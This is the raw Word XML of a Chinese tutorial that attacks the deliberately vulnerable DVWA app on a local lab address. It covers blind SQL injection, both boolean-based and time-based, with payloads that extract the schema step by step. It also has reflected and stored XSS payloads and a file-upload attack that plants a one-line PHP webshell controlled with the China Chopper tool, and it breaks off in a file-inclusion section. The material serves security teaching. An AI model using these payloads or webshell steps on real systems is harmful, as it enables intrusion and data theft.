        <w:t xml:space="preserve"> the database.`</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因此这里是SQL盲注漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>漏洞利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演示</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>基于布尔的盲注</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.判断是否存在注入，注入是字符型还是数字型</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显示相应用户存在：</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DA9861A" wp14:editId="3B8A5BE7">
            <wp:extent cx="4434205" cy="1449070"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="120" name="图片 120" descr="1.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4205" cy="144907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and 1=1 #，显示存在：</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45F47932" wp14:editId="4EDA498E">
            <wp:extent cx="4537710" cy="1466215"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="119" name="图片 119" descr="1.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7710" cy="146621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and 1=2 #，显示不存在：</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2744B6FC" wp14:editId="122CB8B1">
            <wp:extent cx="4632325" cy="1397635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="118" name="图片 118" descr="1.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2325" cy="139763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存在字符型的SQL盲注。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.猜解当前数据库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想要猜解数据库名，首先要猜解数据库名的长度，然后挨个猜解字符。</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length(database())=1 #，显示不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length(database())=2 #，显示不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length(database())=3 #，显示不存在；</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输入1’ and length(database())=4 #，显示存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名长度为4。</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下面采用二分法猜解数据库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gt;97 #，显示存在，说明数据库名的第一个字符的ascii值大于97（小写字母a的ascii值）；</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22 #，显示存在，说明数据库名的第一个字符的ascii值小于122（小写字母z的ascii值）；</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09 #，显示存在，说明数据库名的第一个字符的ascii值小于109（小写字母m的ascii值）；</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03 #，显示存在，说明数据库名的第一个字符的ascii值小于103（小写字母g的ascii值）；</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00 #，显示不存在，说明数据库名的第一个字符的ascii值不小于100（小写字母d的ascii值）；</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gt;100 #，显示不存在，说明数据库名的第一个字符的ascii值不大于100（小写字母d的ascii值），所以数据库名的第一个字符的ascii值为100，即小写字母d。</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重复上述步骤，就可以猜解出完整的数据库名（dvwa）了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.猜解数据库中的表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数据库中表的数量：</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lastRenderedPageBreak/>
        <w:t>1’ and (select count (table_name) from information_schema.tables where table_schema=database())=1 # 显示不存在</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select count (table_name) from information_schema.tables where table_schema=database() )=2 # 显示存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中共有两个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表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length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 # 显示不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length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=2 # 显示不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length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 # 显示存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第一个表名长度为9。</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gt;97 # 显示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lt;122 # 显示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lt;109 # 显示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lt;103 # 显示不存在</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gt;103 # 显示不存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第一个表的名字的第一个字符为小写字母g。</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lastRenderedPageBreak/>
        <w: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重复上述步骤，即可猜解出两个表名（guestbook、users）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.猜解表中的字段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表中字段的数量：</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select count(column_name) from information_schema.columns where table_name= ’users’)=1 # 显示不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select count(column_name) from information_schema.columns where table_name= ’users’)=8 # 显示存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有8个字段。</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字段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length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=1 # 显示不存在</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length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=7 # 显示存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的第一个字段为7个字符长度。</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采用二分法，即可猜解出所有字段名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.猜解数据</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同样采用二分法。</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还可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>基于时间的盲注</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.判断是否存在注入，注入是字符型还是数字型</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sleep(5) #，感觉到明显延迟；</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输入1 and sleep(5) #，没有延迟；</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存在字符型的基于时间的盲注。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.猜解当前数据库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数据名的长度：</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database())=1,sleep(5),1) #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database())=2,sleep(5),1) #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database())=3,sleep(5),1) # 没有延迟</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lastRenderedPageBreak/>
        <w:t>1’ and if(length(database())=4,sleep(5),1) # 明显延迟</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名长度为4个字符。</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采用二分法猜解数据库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ascii(substr(database(),1,1))&gt;97,sleep(5),1)# 明显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ascii(substr(database(),1,1))&lt;100,sleep(5),1)#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ascii(substr(database(),1,1))&gt;100,sleep(5),1)#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说明数据库名的第一个字符为小写字母d。</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重复上述步骤，即可猜解出数据库名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.猜解数据库中的表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数据库中表的数量：</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select count(table_name) from information_schema.tables where table_schema=database() )=1,sleep(5),1)# 没有延迟</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select count(table_name) from information_schema.tables where table_schema=database() )=2,sleep(5),1)# 明显延迟</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中有两个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表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substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1) #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length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) # 明显延迟</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第一个表名的长度为9个字符。</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采用二分法即可猜解出表名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.猜解表中的字段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表中字段的数量：</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select count(column_name) from information_schema.columns where table_name= ’users’)=1,sleep(5),1)#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lastRenderedPageBreak/>
        <w:t>…</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select count(column_name) from information_schema.columns where table_name= ’users’)=8,sleep(5),1)# 明显延迟</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中有8个字段。</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字段名：</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substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=1,sleep(5),1) # 没有延迟</w:t>
      </w:r>
    </w:p>
    <w:p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length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=7,sleep(5),1) # 明显延迟</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的第一个字段长度为7个字符。</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采用二分法即可猜解出各个字段名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.猜解数据</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同样采用二分法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="009655A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>XSS</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XSS，全称Cross Site Scripting，即跨站脚本攻击，某种意义上也是一种注入攻击，是指攻击者在页面中注入恶意的脚本代码，当受害者访问该页面时，恶意代码会在其浏览器上执行，需要强调的是，XSS不仅仅限于JavaScript，还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中，XSS可以分为存储型的XSS与反射型的XSS。</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DOM型的XSS由于其特殊性，常常被分为第三种，这是一种基于DOM树的XSS。例如服务器端经常使用document.boby.innerHtml等函数动态生成html页面，如果这些函数在引用某些变量时没有进行过滤或检查，就会产生DOM型的XSS。DOM型XSS可能是存储型，也有可能是反射型。</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注：下面的实验都是在Firefox浏览器下进行的，感谢火狐没做XSS filter）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="009655A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>反射型XSS</w:t>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php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 Is there any inpu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 array_key_exists( "name", $_GET ) &amp;&amp; $_GET[ 'name' ] != NULL )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Feedback </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> end user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echo '&lt;pre&gt;Hello ' . $_GET[ 'name' ] . '&lt;/pre&g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g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代码直接引用了name参数，并没有任何的过滤与检查，存在明显的XSS漏洞。</w:t>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r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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lt;script&gt;alert(/xss/)&lt;/script&gt;，成功弹框：</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8B61B4B" wp14:editId="5D41E08A">
            <wp:extent cx="5193102" cy="2562045"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="143" name="图片 143" descr="1.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3467" cy="256222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相应的XSS链接：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="004D4162" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId95" w:history="1">
        <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
          <w:rPr>
            <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://192.168.153.130/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ealert(/xss/)%3C%2Fscript%3E#</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="009655A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>存储型XSS</w:t>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lt;?php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 xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>isset</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve">( $_POST[ 'btnSign' ] ) )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Get inpu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essage = trim( $_POST[ 'mtxMessage' ]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 xml:space="preserve">    $name    = trim( $_POST[ 'txtName' ]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Sanitize message inpu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essage = stripslashes( $message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essage = mysql_real_escape_string( $message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Sanitize name input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name = mysql_real_escape_string( $name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Update database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query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name'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result = mysql_query( $query ) </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>die</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve">( '&lt;pre&gt;' . mysql_error() . '&lt;/pre&gt;' );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ysql_close();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g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相关函数介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trim(string,charlist)</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函数移除字符串两侧的空白字符或其他预定义字符，预定义字符包括、\t、\n、\x0B、\r以及空格，可选参数charlist支持添加额外需要删除的字符。</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mysql_real_escape_string(string,connection)</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函数会对字符串中的特殊符号（\x00，\n，\r，\，‘，“，\x1a）进行转义。</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stripslashes(string)</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函数删除字符串中的反斜杠。</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对输入并没有做XSS方面的过滤与检查，且存储在数据库中，因此这里存在明显的存储型XSS漏洞。</w:t>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r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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message一栏输入&lt;script&gt;alert(/xss/)&lt;/script&gt;，成功弹框：</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434FF53C" wp14:editId="6D7FD63C">
            <wp:extent cx="5184476" cy="2622431"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="139" name="图片 139" descr="1.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4711" cy="262255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name一栏前端有字数限制，抓包改为&lt;script&gt;alert(/name/)&lt;/script&gt;：</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C4ABB06" wp14:editId="39F5BF81">
            <wp:extent cx="5081270" cy="2769235"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="138" name="图片 138" descr="1.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1270" cy="276923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成功弹框：</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3C0880A" wp14:editId="2C2FA8BF">
            <wp:extent cx="5167223" cy="2199668"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="137" name="图片 137" descr="1.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7157" cy="2199640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="009655A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>File Upload</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File Upload，即文件上传漏洞，通常是由于对上传文件的类型、内容没有进行严格的过滤、检查，使得攻击者可以通过上传木马获取服务器的webshell权</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>限，因此文件上传漏洞带来的危害常常是毁灭性的，Apache、Tomcat、Nginx等都曝出过文件上传漏洞。</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B697B4F" wp14:editId="58AC49F5">
            <wp:extent cx="5287993" cy="2889801"/>
            <wp:effectExtent l="0" t="0" r="8255" b="6350"/>
            <wp:docPr id="75" name="图片 75" descr="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8147" cy="2889885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面将对Low级别的代码进行分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POST[ 'Upload' ] ) ) { </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    // Where are we going to be writing to? </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    // Can we move the file to the upload folder?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move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        // No </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        echo '&lt;pre&gt;Your image was not upload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Yes! </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        echo "&lt;pre&gt;{$target_path} succesfully upload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 </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i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>basename(path,suffix)</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>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lastRenderedPageBreak/>
        <w:t>函数返回路径中的文件名部分，如果可选参数suffix为空，则返回的文件名包含后缀名，反之不包含后缀名。</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服务器对上传文件的类型、内容没有做任何的检查、过滤，存在明显的文件上传漏洞，生成上传路径后，服务器会检查是否上传成功并返回相应提示信息。</w:t>
      </w:r>
    </w:p>
    <w:p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文件上传漏洞的利用是有限制条件的，首先当然是要能够成功上传木马文件，其次上传文件必须能够被执行，最后就是上传文件的路径必须可知。不幸的是，这里三个条件全都满足。</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上传文件hack.php（一句话木马）</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649E280C" wp14:editId="227351B7">
            <wp:extent cx="2837815" cy="1414780"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="74" name="图片 74" descr="1.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37815" cy="1414780"/>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上传成功，并且返回了上传路径</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D12AEE6" wp14:editId="10CC8A18">
            <wp:extent cx="5262113" cy="2018581"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="73" name="图片 73" descr="1.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2332" cy="201866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打开中国菜刀，右键添加，</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地址栏填入上传文件所在路径</w:t>
      </w:r>
      <w:hyperlink r:id="rId108" w:history="1">
        <w:r w:rsidRPr="009655A2">
          <w:rPr>
            <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://192.168.153.130/dvwa/hackable/uploads/hack.php，</w:t>
        </w:r>
      </w:hyperlink>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参数名（一句话木马口令）为apple。</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1DA7AB6" wp14:editId="05A2503E">
            <wp:extent cx="5270740" cy="3752106"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1270"/>
            <wp:docPr id="72" name="图片 72" descr="1.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893" cy="375221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然后菜刀就会通过向服务器发送包含apple参数的post请求，在服务器上执行任意命令，获取webshell权限。</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下载、修改服务器的所有文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="009655A2">
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>File Inclusion</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File Inclusion，意思是文件包含（漏洞），是指当服务器开启allow_url_include选项时，就可以通过php的某些特性函数（include()，require()和include_once()，require_once()）利用url去动态包含文件，此时如果没有对文件来源进行严格审查，就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞，远程文件包含漏洞是因为开启了php配置中的allow_url_fopen选项（选项开启之后，服务器允许包含一个远程的文件）。</w:t>
      </w:r>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3EED0FDF" wp14:editId="2786C471">
            <wp:extent cx="5183859" cy="2441275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="50" name="图片 50" descr="1.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496" cy="2441575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面将对Low级别的代码进行分析。</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lastRenderedPageBreak/>
        <w:t>服务器端核心代码</w:t>
      </w:r>
    </w:p>
    <w:p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1"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>&lt;php</w:t>
      </w:r>
    </w:p>
    <w:p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1"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>//Thepagewewishtodisplay</w:t>
      </w:r>
